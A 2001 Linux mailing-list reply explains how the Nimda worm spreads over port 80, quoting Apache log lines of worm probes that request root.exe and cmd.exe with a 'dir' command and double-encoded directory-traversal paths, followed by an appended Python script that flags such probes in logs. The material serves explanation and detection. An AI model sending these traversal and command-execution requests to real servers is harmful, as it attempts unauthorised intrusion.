+++ Yashpal Nagar [linux-india] <13/11/01 13:21 +0530>:
> > Fine ... didn't know hathway had that much sense, especially given there's
> > tons of nimda, open relays (iis, deadrat 6.x etc) on cablemodem networks.
> If I request them to open these ports, will they do it, and what's the harm
> in opening that? How does nimda etc. spread with 80?
Look at this - in my APACHE logs at that ... tons of it. If it finds
root.exe, cmd.exe then boom, you're infected.
202.153.121.23 - - [19/Sep/2001:07:56:11 +0530] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
202.153.121.23 - - [19/Sep/2001:07:56:12 +0530] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 288 "-" "-"
202.153.121.23 - - [19/Sep/2001:07:56:14 +0530] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
202.153.121.23 - - [19/Sep/2001:07:56:15 +0530] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
202.153.121.23 - - [19/Sep/2001:07:56:17 +0530] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"
202.153.127.21 - - [19/Sep/2001:07:56:17 +0530] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
202.153.121.23 - - [19/Sep/2001:07:56:18 +0530] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 "-" "-"
> > You could try that - but basically no point in doing something like that.
> Will every request come from my apache on online server OR redirect of apache
> will be fetching each page from my gateway itself?
The request first has to go to the server ... and you have to work around the
port blocks first.
-srs
_______________________________________________
linux-india-help mailing list
[EMAIL PROTECTED]
https://lists.sourceforge.net/lists/listinfo/linux-india-help
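
An added example, not part of the original post: a small Python pass over Apache access-log lines that flags the probe pattern shown in the log excerpt above (requests for root.exe or cmd.exe, including the double-encoded `..%255c..` traversal form) and counts any probe that was not answered with 404. The function names and the 192.0.2.10 sample line are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote
# Apache log line: host ident user [time] "METHOD uri proto" status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')

def decode_path(uri, rounds=3):
    """Drop the query, percent-decode until stable (%255c -> %5c -> backslash), lowercase."""
    path = uri.split("?", 1)[0]
    for _ in range(rounds):
        nxt = unquote(path)
        if nxt == path:
            break
        path = nxt
    return path.lower().replace("\\", "/")  # treat backslash as a path separator

def classify(uri):
    """Return the probe indicators present in one request URI."""
    path = decode_path(uri)
    tags = {name for name in ("root.exe", "cmd.exe") if path.endswith("/" + name)}
    if "../" in path:
        tags.add("traversal")
    if "%25" in uri:  # an encoded '%' means the request was encoded twice
        tags.add("double-encoded")
    return tags

def summarize(lines):
    """Per source IP: probe count, indicators seen, and probes NOT answered 404."""
    report = defaultdict(lambda: {"probes": 0, "tags": set(), "not_404": 0})
    for line in lines:
        m = LINE_RE.match(line)
        tags = classify(m.group(2)) if m else set()
        if tags:
            entry = report[m.group(1)]
            entry["probes"] += 1
            entry["tags"] |= tags
            entry["not_404"] += m.group(3) != "404"
    return dict(report)

SAMPLE = [  # first three lines are from the post; the last one is constructed
    '202.153.121.23 - - [19/Sep/2001:07:56:11 +0530] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"',
    '202.153.121.23 - - [19/Sep/2001:07:56:17 +0530] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"',
    '202.153.127.21 - - [19/Sep/2001:07:56:17 +0530] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 290 "-" "-"',
    '192.0.2.10 - - [19/Sep/2001:07:57:02 +0530] "GET /index.html HTTP/1.0" 200 1043 "-" "-"',
]

if __name__ == "__main__":
    for ip, entry in summarize(SAMPLE).items():
        print(ip, entry["probes"], sorted(entry["tags"]), "not-404:", entry["not_404"])
```

A nonzero not-404 count for a source means the server answered one of these requests with something other than "not found", which is the case worth investigating first.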